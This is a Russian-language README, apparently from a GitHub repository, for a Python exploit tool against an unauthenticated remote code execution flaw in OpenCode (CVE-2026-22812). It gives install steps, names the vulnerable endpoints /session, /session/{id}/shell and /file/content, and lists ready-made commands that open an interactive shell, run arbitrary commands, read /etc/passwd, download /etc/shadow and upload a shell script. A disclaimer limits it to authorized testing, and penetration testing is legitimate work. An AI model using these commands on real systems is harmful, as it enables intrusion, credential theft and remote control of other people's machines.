
Python-эксплойт-инструмент для OpenCode RCE (CVE-2026-22812), обеспечивающий выполнение команд, чтение/запись/загрузку/скачивание файлов и интерактивную оболочку для авторизованного тестирования на проникновение.
Инструмент эксплуатации на Python для уязвимости удалённого выполнения кода (RCE) в OpenCode, затрагивающей версии < v1.0.216. Инструмент предоставляет несколько векторов атаки, включая выполнение команд, чтение/запись файлов, загрузку/скачивание файлов и интерактивную оболочку.
⚠️ ТОЛЬКО ДЛЯ АВТОРИЗОВАННОГО ТЕСТИРОВАНИЯ ⚠️
# Клонирование репозитория
git clone https://github.com/0xgh057r3c0n/CVE-2026-22812.git
cd CVE-2026-22812
# Установка зависимостей
pip install requests urllib3
# Сделать исполняемым (необязательно)
chmod +x CVE-2026-22812.py
requestsurllib3python3 CVE-2026-22812.py -t http://target:port [options]
# Проверка, уязвима ли цель
python3 exploit.py -t http://10.0.0.1:4096 --check
# Интерактивная оболочка
python3 exploit.py -t http://10.0.0.1:4096 -i
# Выполнение одной команды
python3 exploit.py -t http://10.0.0.1:4096 -c "id"
# Чтение файла
python3 exploit.py -t http://10.0.0.1:4096 -r /etc/passwd
# Загрузка файла
python3 exploit.py -t http://10.0.0.1:4096 --upload shell.sh /tmp/shell.sh
# Скачивание файла
python3 exploit.py -t http://10.0.0.1:4096 --download /etc/shadow shadow.txt
# Получение информации о системе
python3 exploit.py -t http://10.0.0.1:4096 --info
# Использование прокси (Burp Suite и т.д.)
python3 exploit.py -t http://10.0.0.1:4096 -c "whoami" --proxy http://127.0.0.1:8080
Находясь в интерактивной оболочке (флаг -i), вы можете использовать:
<command> Выполнить команду оболочки
help Показать меню справки
exit Выйти из оболочки
session Показать идентификатор сессии
stats Показать статистику эксплуатации
read <file> Прочитать содержимое файла
download <remote> <local> Скачать файл
upload <local> <remote> Загрузить файл
sysinfo Получить информацию о системе
Уязвимость существует в конечной точке управления сессиями (/session), которая позволяет неаутентифицированным пользователям создавать сессии и выполнять произвольные команды через конечную точку /session/{id}/shell.
POST /session — Создание сессииPOST /session/{id}/shell — Выполнение командGET /file/content — Чтение файловCVE-2026-22812.py
├── Класс Colors (коды ANSI-цветов)
├── print_banner() (Отображение баннера)
├── Класс Exploit (Основная логика эксплуатации)
│ ├── __init__() (Инициализация)
│ ├── check_vuln() (Проверка уязвимости)
│ ├── create_session() (Создание сессии)
│ ├── exec_cmd() (Выполнение команды)
│ ├── read_file() (Чтение файла)
│ ├── write_file() (Запись файла)
│ ├── upload() (Загрузка файла)
│ ├── download() (Скачивание файла)
│ ├── get_info() (Информация о системе)
│ ├── shell() (Интерактивная оболочка)
│ └── Вспомогательные методы
└── main() (Разбор аргументов)
Этот инструмент выпущен исключительно в образовательных целях. Используйте на свой страх и риск.
По вопросам и проблемам, пожалуйста: